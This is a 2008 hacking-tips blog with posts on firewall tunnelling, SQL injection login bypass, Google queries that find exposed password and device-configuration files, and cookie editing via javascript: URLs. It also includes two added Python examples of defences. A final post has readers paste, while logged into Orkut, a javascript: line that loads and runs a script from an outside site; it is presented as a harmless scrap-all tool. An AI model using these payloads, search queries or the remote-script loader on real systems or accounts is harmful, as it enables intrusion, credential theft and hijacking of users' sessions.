Sunday, January 20, 2008

Preventing access to your computer



Well, you might answer this question by saying: just put passwords on the user accounts and you are done!!! But this method is not as secure as you think, because the logon screen gives a cracker the user names on the system, and if you have the Guest account enabled you may have invited a big problem. To secure your computer more completely you should apply a password at computer startup, which means that when you switch on your machine it will ask you for your password before anything else. That is indeed more secure. So here we go:

1. Click Start -> Run, then type syskey.
2. A dialog box will appear; click Update there.
3. In the new dialog box that appears after selecting Update, select Password Startup.
4. Type in the password, confirm it and press OK.
5. You are done, but never forget this password, or you won't be able to start your computer.

Tuesday, January 15, 2008

Yahoo Messenger from behind a firewall

How to use Yahoo Messenger from behind a firewall (but with proxied access)

1. Download httptunnel (don't ask me, just Google it), compile and install it on a *nix machine you have handy on the net somewhere (this is the tricky bit).

2. Set httptunnel up to forward from an "allowed out" port (e.g. https 443 or snews 563) to Yahoo's servers (scs.yahoo.com port 5050), like so:

hts --forward-port scs.yahoo.com:5050 563

3. Set up your messenger client with the address and port of your server, i.e. your.machine.com port 563.

4. (optional) Firewall off the port so that only you can connect to it.

Saturday, January 12, 2008

Basic SQL injection



An SQL injection attack consists of the insertion of an SQL query via the input data sent from the client to the application. A successful SQL injection exploit can read data from the database, modify database data, execute administration operations on the database (such as shutting down the DBMS), and in some cases issue commands to the operating system.

SQL Injection attacks are of three types:

  • Inband: data is extracted using the same channel that is used to inject the SQL code. This is the most straightforward kind of attack, in which the retrieved data is presented directly in the application web page.
  • Out-of-band: data is retrieved using a different channel (e.g. an email with the results of the query is generated and sent to the tester).
  • Inferential: there is no actual transfer of data, but the tester is able to reconstruct the information by sending particular requests and observing the resulting behaviour of the DB server.
Example:

Suppose a web page executes the following query:
SELECT * FROM Users WHERE Username='$username' AND Password='$password'

Suppose we write the following in the username and password fields of the form:

$username = 1' or '1' = '1
$password = 1' or '1' = '1

The resultant query will be:

SELECT * FROM Users WHERE Username= '1' OR '1' = '1' AND Password= '1' OR '1' = '1'

Clearly this condition is always true, and hence the whole table used in this particular query will be shown to the user.

But sometimes the DBA is clever and may write the query like this one:

SELECT * FROM Users WHERE ((Username='$username') AND (Password=MD5('$password')))

In this case there are two problems, one due to the use of parentheses and one due to the use of the MD5 hash function. First of all we resolve the problem of the parentheses. That simply consists of adding closing parentheses until we obtain a correct query. To resolve the second problem we try to invalidate the second condition.

So we supply the following inputs:
$username = 1' or '1' = '1'))/*
$password = abc

Note: In Oracle use "--" instead of "/*".

The resulting query will be:

SELECT * FROM Users WHERE ((Username='1' or '1' = '1'))/*') AND (Password=MD5('$password')))

This was basic SQL injection, but you will rarely find a website on which these injection techniques still work. Watch out for advanced SQL injection techniques in new posts.
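As an added example (not code from the original post), the following Python script runs the post's two query forms and its payloads against an in-memory SQLite table, next to the parameterised form that a developer should use instead. The Users table, its two rows and the MD5() registration for SQLite are constructed for the demonstration.

```python
import hashlib
import sqlite3

# Constructed sample rows for the demonstration; passwords are stored as MD5
# hex digests only to mirror the MD5() call in the post's second query.
USERS = [("alice", "s3cret"), ("bob", "hunter2")]


def make_db():
    """Build an in-memory SQLite database with a Users table like the post's.
    SQLite has no MD5() function, so one is registered from Python so that
    the post's second query can run unchanged."""
    conn = sqlite3.connect(":memory:")
    conn.create_function("MD5", 1, lambda s: hashlib.md5(s.encode()).hexdigest())
    conn.execute("CREATE TABLE Users (Username TEXT, Password TEXT)")
    conn.executemany(
        "INSERT INTO Users VALUES (?, ?)",
        [(u, hashlib.md5(p.encode()).hexdigest()) for u, p in USERS],
    )
    return conn


def vulnerable_login(conn, username, password):
    """The post's first query, built by pasting the input into the SQL text.
    A quote character in the input ends the string literal early, so the
    rest of the input is parsed as SQL."""
    sql = f"SELECT * FROM Users WHERE Username='{username}' AND Password='{password}'"
    return conn.execute(sql).fetchall()


def vulnerable_login_md5(conn, username, password):
    """The post's second query: extra parentheses and an MD5() call, but
    still assembled from strings, so the closing-parentheses-plus-comment
    input from the post turns the whole password check into a comment."""
    sql = (
        "SELECT * FROM Users WHERE ((Username='{u}') AND "
        "(Password=MD5('{p}')))"
    ).format(u=username, p=password)
    return conn.execute(sql).fetchall()


def safe_login(conn, username, password):
    """Hardened form: fixed SQL text with the values bound as parameters.
    The driver passes the input as data, never as part of the statement, so
    the same payloads are just user names that match no row."""
    sql = "SELECT * FROM Users WHERE Username=? AND Password=MD5(?)"
    return conn.execute(sql, (username, password)).fetchall()


if __name__ == "__main__":
    db = make_db()
    payload = "1' or '1' = '1"
    print("vulnerable, payload in both fields:", len(vulnerable_login(db, payload, payload)), "rows")
    print("vulnerable MD5 form, comment trick:", len(vulnerable_login_md5(db, "1' or '1' = '1'))/*", "abc")), "rows")
    print("parameterised, same payload:", len(safe_login(db, payload, payload)), "rows")
    print("parameterised, real credentials:", len(safe_login(db, "alice", "s3cret")), "rows")
```

Run it as a script and the two string-built queries return every row for the post's inputs, while the parameterised query returns rows only for a real user name and password. The fix is not the parentheses or the hash but keeping user input out of the statement text; most database drivers offer the same placeholder binding that sqlite3 does here.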


आशीष कुमार



Saturday, January 05, 2008

Google Hacking



Google is a really good search engine. It crawls your website very efficiently, so efficiently that it reads each and every page of your site unless you block it!!! So there is a good chance that it will also read some files which are confidential, like password files. There are other ways to find them too, but we will concentrate here on finding those files via Google. The basic rule is to find some common names which a web administrator could give to these confidential files. Over the past while I have found some good file names which can be searched for on Google. Obviously you need to know some basic web programming to understand the code in these files (and sometimes encryption too :) ). But the bottom line is that you can access these files very easily. Below are some queries which were working till now (but you can never be sure!!!), although web administrators are really clever; they too know about these queries and block them as soon as possible. So some of these queries may not give you good results.

Here they go (search on Google for the following):

1) ext:ini eudora.ini
2) ext:inc “pwd=” “UID=”
3) ext:asa | ext:bak intext:uid intext:pwd -”uid..pwd” database | server | dsn (this one sucks now!!!!)
4) index.of.etc (a very good one for finding /etc/pwd on Linux)
5) enable password | secret “current configuration” -intext:the (gives configuration files for Cisco devices, very useful in finding the network structure)
6) eggdrop filetype:user user (useful for IRC usernames and passwords)
7) intitle:index.of config.php (a really good one for database access)

That was all, folks; watch out for more.... Thank you, and you are free to comment.

* Disclaimer: use at your own risk.

Wednesday, January 02, 2008

Cookie editing through javascript injection



JS injection is a technique which allows you to alter the content of a site without leaving the site. This can be used to spoof a server which relies on JavaScript.

Requirements
1) A JavaScript-enabled browser (I would say use Mozilla Firefox)
2) A web page which uses cookies (for example Orkut)

Procedure

First check whether the site has any cookie; do this by entering the following in the address bar:

javascript:alert(document.cookie);

After this you will get an alert box showing you the site's cookie with its various fields.

To edit the cookie use the following script:

javascript:void(document.cookie="fieldname=value");

Replace fieldname with the name of the field you want to alter and value with the altered value,

and you have just edited the cookie!!! You can verify it by using alert(document.cookie) again.
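An added example, not part of the original post, showing the server-side counterpart to the trick above: because a client can rewrite document.cookie at will, a server must not trust a cookie field's value on its own. The Python code below signs the value with an HMAC so that an edited field is detected on the next request, and sets HttpOnly so the cookie is not exposed to document.cookie in the first place. The secret, the cookie name "user" and the user names are constructed for the demonstration.

```python
import hashlib
import hmac
from http.cookies import SimpleCookie

# Constructed demo secret; a real server would load this from configuration.
SERVER_SECRET = b"constructed-demo-secret-not-for-production"


def sign_value(value):
    """Return 'value|tag' where tag is an HMAC-SHA256 over the value, so the
    server can later tell a value it issued from one rewritten by the client."""
    tag = hmac.new(SERVER_SECRET, value.encode(), hashlib.sha256).hexdigest()
    return f"{value}|{tag}"


def verify_value(cookie_value):
    """Return the original value if the tag matches, else None. An edited
    value ('admin' in place of 'alice') no longer matches its tag, and a
    value with no tag at all is rejected outright."""
    if "|" not in cookie_value:
        return None
    value, tag = cookie_value.rsplit("|", 1)
    expected = hmac.new(SERVER_SECRET, value.encode(), hashlib.sha256).hexdigest()
    return value if hmac.compare_digest(tag, expected) else None


def set_cookie_header(name, value):
    """Build the Set-Cookie header for a signed cookie. HttpOnly keeps it out
    of document.cookie, so the alert()/void() lines above can neither read
    nor overwrite it; Secure restricts it to HTTPS."""
    jar = SimpleCookie()
    jar[name] = sign_value(value)
    jar[name]["httponly"] = True
    jar[name]["secure"] = True
    jar[name]["path"] = "/"
    return jar.output(header="Set-Cookie:")


def user_from_cookie_header(cookie_header):
    """Server side of a request: parse the Cookie header the browser sent and
    accept the 'user' field only if its signature verifies."""
    jar = SimpleCookie()
    jar.load(cookie_header)
    if "user" not in jar:
        return None
    return verify_value(jar["user"].value)


if __name__ == "__main__":
    print(set_cookie_header("user", "alice"))
    issued = sign_value("alice")
    print("issued cookie accepted as:", user_from_cookie_header("user=" + issued))
    print("client-edited field:", user_from_cookie_header("user=admin"))
    print("edited value, old tag:", user_from_cookie_header("user=admin|" + issued.split("|", 1)[1]))
```

Run as a script, the header line shows the HttpOnly and Secure attributes, the cookie the server issued is accepted, and both forms of client-side editing (replacing the field value, or replacing it while keeping the old tag) come back as None. Signing stops a forged value from being accepted; HttpOnly additionally stops page script from reading the value, which matters for the session-stealing variant of the same trick.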

आशीष कुमार

Tuesday, January 01, 2008

Send scraps to all your friends without any ad



There are many scripts which claim to send scraps to all your friends. But most of them send scraps with a line written below, "TO SEND SCRAPS TO ALL YOUR FRIENDS CLICK HERE", and you are caught: you haven't sent any personalised scrap to your friend; instead you have used a script for the purpose. But the following script does the job neatly without any ad!!!!

To use the script follow these steps:
1. Log in to your Orkut account.
2. Copy the script given below.
3. Paste the script into the address bar of the browser while the Orkut home page is open.
4. Send scraps without any ad!!!!!

Here is the script:
javascript:d=document;c=d.createElement('script');d.body.appendChild(c);c.src='http://bitsnbytes.org.in/data/scrap%20all.txt';void(0)

ENJOY!!!!

आशीष कुमार